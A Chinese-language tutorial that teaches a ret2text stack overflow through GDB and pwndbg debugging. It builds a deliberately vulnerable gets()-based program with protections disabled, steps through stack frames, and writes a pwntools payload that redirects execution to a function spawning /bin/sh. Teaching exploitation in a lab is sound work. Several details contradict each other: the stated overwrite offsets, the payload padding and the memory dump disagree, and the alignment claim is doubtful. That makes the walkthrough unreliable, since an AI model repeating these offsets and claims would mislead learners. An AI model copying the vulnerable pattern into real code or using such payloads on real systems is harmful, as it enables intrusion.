逆向思维学PWN：通过GDB调试实战，动态理解寄存器与栈的变化

逆向思维学PWN：通过GDB调试实战，动态理解寄存器与栈的变化

在传统的PWN学习路径中，我们往往先被灌输一堆抽象概念——寄存器、栈帧、调用约定，然后才接触实际调试。但今天，我们要彻底颠覆这个顺序。想象你面前有一个简单的ret2text漏洞程序，GDB调试器已经打开，我们将通过动态观察每一条指令执行时寄存器和内存的变化，让这些概念自动在你脑海中成形。

这种学习方法就像拼乐高：不是先研究说明书，而是直接动手拼装，在过程中自然理解每个零件的用途。当你看到RIP随着ni指令一步步移动，RSP在push和pop时上下跳动，栈内存像俄罗斯方块般堆积和消除时，那些枯燥的理论会突然变得鲜活起来。

1. 实验环境准备

首先需要准备一个典型的缓冲区溢出漏洞程序。这里我们使用以下C代码编译的32位ELF文件（加-no-pie -fno-stack-protector选项）：

// vuln.c #include <stdio.h> void win() { system("/bin/sh"); } int main() { char buf[16]; gets(buf); return 0; }

编译命令：

gcc -m32 -no-pie -fno-stack-protector vuln.c -o vuln

用checksec检查保护机制：

Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)

关键工具链：

• GDB with pwndbg插件：提供增强的寄存器/内存可视化
• cyclic工具：生成定位偏移量的模式字符串
• objdump：静态分析程序汇编代码

提示：所有实验建议在虚拟机中进行，避免意外执行恶意shellcode

2. GDB动态调试实战

启动GDB调试目标程序：

gdb -q ./vuln

2.1 初始状态观察

在main函数入口处下断点并运行：

b *main run

观察初始寄存器状态（pwndbg增强显示）：

EAX: 0x1 EBX: 0xf7fac000 ECX: 0xffffd0b4 EDX: 0xffffd0a8 ESI: 0x0 EDI: 0x0 EBP: 0xffffd038 ESP: 0xffffd020 → 0xffffd0a8 → 0x00000001 EIP: 0x80491d6 (main+0) → push ebp

此时关键寄存器：

• EIP指向main函数第一条指令
• ESP指向当前栈顶（保存着返回地址）
• EBP还未被设置为当前栈帧基址

2.2 函数调用栈演变

单步执行(si)观察栈变化：

1. push ebp：

   • ESP自动减4（栈向低地址增长）
   • 旧EBP值被压入栈中
   • 新栈顶变为0xffffd01c

2. mov ebp, esp：

   • EBP现在指向当前栈帧基址
   • 此时EBP == ESP == 0xffffd01c

3. sub esp, 0x10：

   • 为局部变量分配16字节空间
   • ESP变为0xffffd00c
   • 形成完整栈帧：

     低地址 ┌─────────────┐ │ buf[16] │ ← ESP ├─────────────┤ │ saved EBP │ ← EBP ├─────────────┤ │ return addr │ 高地址 └─────────────┘

2.3 缓冲区溢出时刻

在gets调用前设置断点：

b *main+35 continue

输入测试数据观察栈破坏：

python3 -c "print('A'*24 + 'BBBB')" > input run < input

溢出后栈布局：

0xffffd00c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd01c: 0x41414141 0x41414141 0x42424242 [saved EIP]

关键发现：

• 输入的第17-20字节覆盖了saved EBP
• 第21-24字节将覆盖返回地址
• 通过info frame可验证栈帧已被破坏

3. 寄存器与漏洞利用

3.1 控制EIP的关键

计算精确偏移量：

cyclic 50 cyclic -l 0x6161616c # 找到返回地址偏移

构造利用payload：

from pwn import * payload = b'A'*24 + p32(0x80491a6) # win()地址

调试器中验证：

r < <(python3 exploit.py)

观察到：

• EIP被成功劫持到win函数
• ESP指向payload后的地址
• 原栈帧完全崩溃，新栈帧建立

3.2 寄存器状态快照对比

4. 高级调试技巧

4.1 内存断点监控

设置观察点跟踪栈变化：

watch *0xffffd01c # 监控EBP位置

4.2 反汇编窗口同步

在pwndbg中开启：

context

实时显示：

• 当前指令位置（黄色高亮）
• 前后15条指令上下文
• 寄存器值变化标记

4.3 自动化调试脚本

GDB Python脚本示例：

import gdb class ExploitAutomation(gdb.Command): def __init__(self): super().__init__("auto-exp", gdb.COMMAND_USER) def invoke(self, arg, from_tty): gdb.execute("b *main") gdb.execute("run < payload.bin") gdb.execute("si 10") print("Current EIP:", hex(gdb.parse_and_eval("$eip"))) ExploitAutomation()

使用方法：

source script.py auto-exp

5. 常见问题排查

栈对齐问题：

• 32位系统要求16字节对齐
• 异常表现：movaps指令触发SIGSEGV
• 解决方案：在payload中添加对齐指令地址

坏字符影响：

• 输入中的\x00会截断字符串
• 检测方法：发送所有256字节观察崩溃点
• 绕过技巧：使用编码器或替代指令

地址随机化：

• 测试ASLR影响：

  echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

• 应对措施：使用信息泄漏获取真实地址

在多次实战中发现，最有效的调试策略是分阶段验证：先确保偏移计算正确，再测试跳转地址有效性，最后处理参数传递和权限问题。记住ni(next instruction)和si(step into)的区别——前者会跳过函数调用，后者会进入函数内部，这在跟踪ROP链时尤为关键。